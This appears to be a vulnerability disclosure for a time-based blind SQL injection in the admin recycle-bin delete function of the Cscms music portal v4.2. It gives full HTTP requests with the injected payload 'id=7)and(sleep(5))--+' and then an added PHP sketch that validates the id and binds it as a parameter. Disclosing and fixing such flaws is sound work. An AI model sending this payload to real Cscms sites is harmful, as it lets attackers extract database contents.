There is a SQL blind injection vulnerability in dance_Dance.php_del
Add a song after administrator login

POC

```
POST /admin.php/dance/admin/dance/save HTTP/1.1
Host: cscms.test
Content-Length: 292
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/dance/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_session=vh1bscpjrcvfiil1mcr4qhgo9ri1dck8; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA
Connection: close

cid=1&addtime=ok&name=1&color=&pic=&user=&cion=0&purl=&durl=&reco=0&tid=0&fid=0&zc=&zq=&bq=&hy=&singer=&dx=&yz=&sc=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&shits=0&xhits=0&vip=0&level=0&wpurl=&wppass=&skins=play.html&gc=0&text=&file=&lrc=&title=&keywords=&description=&id=0&sid=0
```
When deleting songs in the recycle bin, construct malicious statements and implement sql injection
```
POST /admin.php/dance/admin/dance/del?yid=3 HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=kpqu73c98lvqmbbkebu36pbd3pferpdb
Connection: close

id=7)and(sleep(5))--+
```
The payload executes and sleeps for 5 seconds
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code
Close "id" to achieve blind injection, so the vulnerability exists
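A defensive sketch for the `id` parameter discussed in the issue above, added here and not part of the original report or of the Cscms code base: it accepts only digit strings and passes the values as bound placeholders instead of splicing them into the SQL text. The function names and the table name `example_dance` are assumptions, since the vulnerable source itself is not reproduced on this page.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not Cscms code: turn the raw "id" POST value into a
// list of positive integers, or reject the request outright.
function parse_id_list(mixed $raw): array
{
    // The endpoint may receive one id, a comma-separated list, or an array.
    $parts = is_array($raw) ? $raw : explode(',', (string) $raw);
    $ids = [];
    foreach ($parts as $part) {
        // ctype_digit() passes only non-empty strings of 0-9, so ")", "(",
        // whitespace, comment markers and signs all fail here.
        if (!is_string($part) || !ctype_digit($part) || strlen($part) > 9) {
            throw new InvalidArgumentException('id must be a list of integers');
        }
        $id = (int) $part;
        if ($id < 1) {
            throw new InvalidArgumentException('id must be positive');
        }
        $ids[] = $id;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no id supplied');
    }
    return array_values(array_unique($ids));
}

// Build a DELETE with one "?" placeholder per id; the values travel
// separately from the SQL text. The table name is a constructed placeholder.
function build_delete(array $ids): array
{
    $marks = implode(',', array_fill(0, count($ids), '?'));
    return ['DELETE FROM example_dance WHERE id IN (' . $marks . ')', $ids];
}

// Constructed inputs: two ordinary values, then the body from the request
// above as it arrives after form decoding ("+" becomes a space).
$samples = ['7', '7,8,9', '7)and(sleep(5))-- '];
foreach ($samples as $raw) {
    try {
        [$sql, $params] = build_delete(parse_id_list($raw));
        echo 'accepted: ' . $sql . ' [' . implode(',', $params) . "]\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . json_encode($raw) . ' (' . $e->getMessage() . ")\n";
    }
}
```

The returned SQL and parameter list are meant to be handed to a prepared statement (for example PDO's `prepare()` and `execute()`), so the validation and the binding each block the injected value on their own.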
SQL injection vulnerability exists in Cscms music portal system v4.2
Details
Add a song after administrator login
![image](https://user-images.githubusercontent.com/96719328/158499410-c2be7972-449a-4534-b767-c01d6b108373.png)